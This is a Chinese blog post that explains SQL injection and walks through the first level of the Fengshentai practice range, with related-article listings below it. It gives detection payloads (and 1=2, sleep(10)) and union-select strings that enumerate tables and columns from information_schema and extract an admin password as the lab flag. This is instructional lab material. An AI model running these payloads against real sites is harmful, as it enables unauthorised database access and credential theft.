初识SQL注入(原理+封神台第一关)

最新推荐文章于 2024-06-28 18:10:49 发布
最新推荐文章于 2024-06-28 18:10:49 发布
阅读量359 收藏 6
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ndjnddjxn/article/details/137371017
版权
本文详细描述了如何利用用户输入的数据作为SQL代码执行,涉及运算符检测、SQL注入检测方法,以及如何通过union查询获取数据库信息,包括字段名、表名和数据内容。还讨论了limit的使用和安全注意事项。
摘要由CSDN通过智能技术生成

1.定义:

用户输入的数据当做SQL代码执行


2.条件:

用户控制。

原本程序要执行代码,与用户的代码拼接执行


3.监测漏洞是否存在(运算符检测漏洞)

and 1=1  (考虑传参强转)  

and   1=2(and可以用&&代替)

 and   sleep(10)  等待数据库,延时(当为静态时)
   id=1+1(如果返回数据为空,则为get传参,所有的get传参都要用URL编码的,+在URL里代表着空格)或id=2-1


4.利用漏洞看是否能拿到数据

union 联合查询

order by(查询字段数)

查询字段名,数据库名,数据库版本,表名

select  字段名  from  表名  where  条件

不建议用group_contact,(多行数据输出)(因为有些情况显示有限制,建议一个一个查询),用limit

注释:/*,--,#

5.例题

?id=1,正常

?id=1 and 1=1,正常

?id=1 and 1=2 有问题,暂时确定有SQL注入

判断字段数

正常

不正常,所以字段数为2

判断回显

?IP=1 and 1=2 union select1,2

在数字2处得到想要的内容

数据库名为maoshe

数据库的版本为5.5.53

得到表名为admin,

语句:?ip=1 and 1=2 uoion select 1, table_name from information_schema.tables where table_schema=database() limit 0,1

limit的用法;

limit a,b表示从a+1条语句开始查询b条语句

查询字段名

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

查出admin下有id,username,password三个字段

查询字段下的内容

Limit 1,1

有两个用户

该题的flag就是密码


 

ndjnddjxn
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 889
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
sql注入初理解
weixin_38631547的博客
03-21 81
mysql的小知识 sql注入之mysql类型数据库结构,mysql中自带4个数据库A. information_schemaB. mysqlC. performance_schemaD. sys 2.在5.6版本mysql中最后的sys更改为test 3.mysql中的特殊库information_schema information_schema数据库是MySQL自带的,它提供了访问数据库元数...
神台----SQL注入基础(猫舍)
m0_74083553的博客
03-11 386
提示已经很明显了通过sql注入拿到管理员密码点击传送门进来发现是一个很简陋的页面点击查看试试看我们可以看到地址栏后面变成了?id=1。说明和后台数据库有交互可以尝试sql注入
神台靶场学习-sql-注入绕过防护getshell
buggun6的博客
11-19 397
很好,没花啥功夫就找到了上传点,要求我们只允许上传的图片类型:gif|jpeg|png|jpg|bmp。总结:这次靶场个人感觉质量还是挺高的,和之前省赛的题有点像, 自己要坚持努力学习!好的进入后台了,现在要找flag很明显就不得不找找文件上传点写码上传试试了。很明显没有返回我们想要的东西,联合注入这条路估计是行不通了。ok,既然拿到用户名和密码了,不直接登录还有其他选项吗。解密发现密码也是admin,好家伙,弱口令是吧(nice,报错注入可以,我们发现数据库了。
神台的一次SQL注入靶场渗透测试
最新发布
人若无名,便可专心练剑
06-28 657
这个题目总的来讲还是蛮中规中矩的,没有对什么关键字进行过滤啥的,但是这里我后面尝试使用sqlmap跑,跑了很久,应该是这个网站对大量流量有个限制啥的,师傅们可以尝试下。这篇文章写出来的WP并不是主要是这道题目,而是给大家讲下做这道题目的一个思路以及实战中的一些注意事项什么的。最后希望能对师傅们有点帮助,嘿嘿嘿!!!
神台靶场SQL注入——SQLmap简单使用
m0_72592923的博客
01-13 1099
神台靶场SQL注入——SQLmap简单使用
SQL注入基本原理
DM766924的博客
09-09 3109
SQL注入基础原理: 1)SQL注入概念及产生原因: 当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2)SQL注入的本质: 把用户输入的数据当作代码来执行,违背了“数据与代码分离”的原则 3)SQL注入的两个关键点: 1,用户能控制输入的内容; 2,web应用把用户输入的内容带入到数据库执行; SQL注入基础危害: )盗取网站的敏感信息; )绕过网
sql注入--1初识sql注入
技术骨干小李的博客
07-13 603
sql注入的迅速了解
第一单元+初识数据与计算++单元测试+2022-2023学年+教科版(2019)高中信息技术必修1
07-24
第一单元+初识数据与计算++单元测试+2022-2023学年+教科版(2019)高中信息技术必修1
千里之堤,溃于蚁穴——揭密SQL注入攻击——初识SQL注入
06-26
SQL注入SQL Injection)是一种常见的安全漏洞,它发生在应用程序没有正确处理用户输入的情况下,允许攻击者通过恶意构造的SQL语句来操控数据库。这种攻击的核心在于利用了应用程序对用户输入数据的信任,而忽略了...
初识SQL
12-14
1.认识SQL SERVER,并回答以下问题: 1)SQL SERVER版本与价格? 见官网 2)SQL SERVER安装 a)下载 ftp://ftp.jmu.edu.cn/Microsoft/Servers/SQL/cn_sql_server_2008_r2_enterprise_x86_x64_ia64_dvd_522233.iso)...
任飞鸟游辅系列第一期初识游辅
07-23
教程名称:任飞鸟游辅系列 第一期 初识游辅教程目录:【】1.内存基础和CE的使用【】2.熟练CE和内存遍历工具【】3.OD基础【】4.CE和OD配合找数组【】5.第一周总结【】6.条件断和选中怪物血【】7.call基础【】8.汇编...
渗透测试之sql注入
weixin_46420165的博客
12-08 2225
SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理
红凳子的博客
05-07 2064
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
神台】有WAF的SQL注入
qq_63806300的博客
12-26 365
神台、waf、sql注入
神台】无WAF的SQL注入
qq_63806300的博客
12-17 1740
神台SQL注入
MySql 高级查询 union 联合查询
qq_39286483的博客
01-09 310
1. union 联合查询 将多个查询结果集合到一起 2. 语法 select 查询语句 union select 查询语句 union select 查询语句 union select 查询语句 3. 例子: 查询学生信息和班级信息,集合到一起 select class_id,class_name,class_room from class UNION select name...
神台SQL注入-延时注入
qq_40941912的博客
10-05 408
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 相关函数 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 sleep() if(expr1.expr2,expr3) =>判断语句,第一个正确执行2,错误执行3 二、作业 (一) SQL注入-延时盲注 R
sqlserver第一章 - 初识sqlserver
03-16
SQL Server是一种关系型数据库管理系统,由Microsoft开发和维护。它可以用于存储和管理大量的数据,并提供了强大的数据查询、分析和处理功能。在SQL Server中,数据以表格的形式存储,每个表格包含多个列和行,每个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值